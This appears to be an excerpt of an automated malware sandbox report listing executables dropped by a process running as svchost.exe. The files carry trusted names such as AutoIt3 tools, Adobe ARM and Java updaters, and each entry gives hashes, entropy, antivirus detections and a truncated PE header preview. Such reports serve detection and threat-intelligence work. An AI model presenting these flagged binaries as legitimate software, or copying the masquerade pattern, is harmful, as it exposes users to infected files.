                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A5A5D4125FFA7A3DE00F3BAEDC5AE1A7065A73E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:312853A2671E1B4101DD8233BBE3FDF65E2200065A7FA8FFA0F2A6B981047556
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:08A665A9FDFA40A4C8A4ECB7888A74E60F3E88E0C9151D1DD5F28008C629E1B1B51A68B1EE66357C76BECBD6A100DACE56A1B63FF3A1E4BE76FD03594AF06697
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... ......%......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.274100738172734
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:qMEhwdbTjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gKdHjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F2736362C7764C4F6470A5C27D290EE8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5E20167B9523007931EE1F82ECB618D51F2CF08C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E44B3705E8E369F1E9AE1F8175A4598C044D58B1B926D173FBA7CB252E9FCC1C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:963B4D657932571AF24F27B7E0864049B0E1038543D803C1FD41F5CC83B35869B47A54409A5362CA68FB194AA7E9A0367891CCD7EC9BFA88FF00D6EC3DD7E7F9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.6470130260013
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:0K0eqkSR7Xgo4TiRPnLWvJfDmg27RnWGj:0K0pR7Xn4TiRCvJfD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0096FD4730FEB421F331FD5951003DDF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6110B1A5154D80731F3EEEF92AA98587AB846E4A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2A2C9C11F758F07DBCA79ACE60C34B87DDBB3B669861D0373B7BD65321024B5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DB8D687FFDF70A5DF3DB5883CB7F93661AF0696DD6A9673A5D3E8BC62EDBC8915E29F466155D7A895EA276ED2478C78B08BD80336CC9B02107E6960353277238
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......M"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.565043446997657
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:4fYP1JsEDkSR7Xgo4TiRPnLWvJfDmg27RnWGj:oYPBR7Xn4TiRCvJfD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AA662A79593DE523DF94690AB29FDF4E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B7F9913BDEC6D16CE1A35BA6FAF56CC20066B2A5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D9C7ED411C99A864BA827DFC86DC25E36740888FDB4956D49B20F8EB59DC8E88
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E77C6FA3844A4588B43B6C9A64297F98B441FA947BE64B35EB87A8FACD4167241B26ADCE8A5C2699423B45C6B82E87D79979F79B958EAA81F2087C52FD126A8B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....\,$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.123533157591023
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:o62SYUcknn5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:dYUckn5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4A54D2213ED7E723E69718B3B27B7A8C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FCB58B43CD3FDBECD365EDF00F6A2BFBFADAB890
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:55C701AD177F834E49C94E80C97AB7F282E4F4FAF8F01F7243DACB5634EB9CBD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B98F7715B26454AF524F347642A9030D606B8779F1051AAA9D1BE509D5D3148002CBFE5188D18C704760860D5FD96DB44945A66F75AE074A29C335202E3105B6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......d.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166645571616767
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:h+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSbDmg27RnWGj:LSktbp9D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E94547710C3F45309DC738E3335F2D4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6A59BD43811B754DBBA09406E2C4E60412FD139
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8EEE34B1056803A62DBAA38BBE960830A7B554F2D291FEF5E3492072F4BE7367
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:21DEF4DBCC42975CD3BEA0842EACE578719918C00AD4AD03DA0574852D1E8C0D3C33DB3B7953597B0D22BCFAD6DAA64FD4E3F572612D8C17D636B436D4741B7D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................s..... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.094614961722314
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:1GSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLwDmg27RnWGj:J4OEtwiICvYMRfQD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5C1775B7D8B829AFD91744CDCE577F26
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A158F629B81E583C37790EC54E0C3947D46B8331
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B94FE11DC6110E1A49274BDC1AAC9B126DB5BA68084A88B3D03EE06B2AEB961F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:211C438054727DDE3F94591F59B11B3C60C6B32FBFBD34E01F302D0760B70BEC388F52169C2EEC84DB1A526F63A4A63F7188B73B3D2643A1EDC05CADDF12541F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......n-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.496369919609941
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:kAMuR+3kMbVjhPsqjnhMgeiCl7G0nehbGZpbD:dD+lbVjhzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EA54CD16257162F234375912305B442F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:11B7A10A9160A2AF44EDE4718F6E30E906A1B532
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:01038713348F4576D0303ACFDB5E24F47810B81F87AD26F96752B5BC637777AF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE084753F22396C70752CBC3E34FBDF5AE81AC78E122721D1EDAA8FEB561F0B710E96A5111153664802AA207A9451CE3D7C78227054F6121BA712EE9D8C7CC53
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2777414101426
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:UImGUcsvZZdubv7hfl3jXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:UxGBcmlzsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:044E4725979E3F506813C6D46BCC5F85
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C58E283FFB381BBD511275BEBC02D0C2BC0252BB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EE051CC80439BA05D9BDF458F0321D1675C17EF18C4B310638B5F1228C519F64
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C2DF024F32A284C0BC731EFE795CF3378B02AF873E40C5108A9E9B01FDE57F7519D42E9665DC54827E78F8446CBBA7426AB0A45CAE8E1BA6EF172702B03F05D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................9.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6947760416141815
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:w0vHyeLj8trn3wsJsqjnhMgeiCl7G0nehbGZpbD:Rtj4rgsNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8AB771C1AD98C47EB13C1ACDDF64C75
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:71ECA8B07A1F0516B99F90A18A47EDD09E1673EA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:814D308B7F799552E0810D9047E607D8323E9A0DEBAFCCFAF2A64202664ACF89
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6919D5763B6BA44B38B2BB21CC0E33B1219D69A13204B1071802F248B5D582EAF334A9A8546FC9E603A78BEB25D6B2181FB84C302443DBDC3F693A016CD0872C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......P.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.279655275012572
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:2oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZksqjnhMgeiCl7G0nehbGZpv:j4i0wGJra0uAUfkVy7/ZADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0BA4A19D1C355CB7CA4DF75EBC1318C1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0DC6DCDDAA1F88CBFCF29F5FA152D140DFF79681
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1A706DD9203BA2BF07F8BA082DCE950FDFD824449D0F5E74969991404D02EDC3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:211297742A218BB3C9D1E8BCE1DFF1A702B7E2460907BA411E3BD9666850FDA245700C811EB499B919BDCE484595858666FB362E1045DB42565A356A7C19A646
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.448753469508892
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:BeR0gB6axoCf0R6RLQRF/TzJqe58BimXsqjnhMgeiCl7G0nehbGZpbD:jgHxmR6uBTzge5MimrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E6FF42EB4F6F34F91EDA57D6FE709791
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9167617AFBB3A70634B9FF9C87FAC40B687E030E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3BBAEB2BB29D05DDB958B2DCF545200AF33CC68F4BE8EAD44FA874F13955B8E4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6886FA971F7B20AAFC603D942B2EB55C937FD77DA904345F060CEC4BA0AFE260625E8E1CAAE3830C2BBD62341CAE8FC6774E98A0E2E195932E2EBBA8B2FF6908
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......0F......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.44603731199687
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:jnEbH0j4x7R6SvyCMZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:jkwOtO7ZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:383D987BD0694AAF0BE742143B08B026
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CAF2BD93E5503DF8AFAC11DA22388646D61C5103
